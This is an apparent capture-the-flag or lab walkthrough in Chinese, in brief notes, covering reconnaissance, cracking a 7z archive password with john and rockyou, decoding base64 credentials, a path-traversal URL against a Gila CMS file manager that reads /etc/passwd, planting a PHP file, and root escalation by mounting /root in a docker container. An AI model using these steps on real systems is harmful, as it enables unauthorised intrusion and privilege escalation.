一、信息收集
ip、端口、指纹

目录扫描

查看frp文件


密码破解

失败换一个
https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py
python 7z2ctf.py arjun.7z > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john hash --show


解码
echo 'Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=' | base64 -d

gila:admin@gmail.com:princesa


查找版本漏洞


http://192.168.152.132/gila/admin/fm/?f=src../../../../etc/passwd

修改文件

创建404php


发现docker

docker run -v /root:/mnt -it alpine

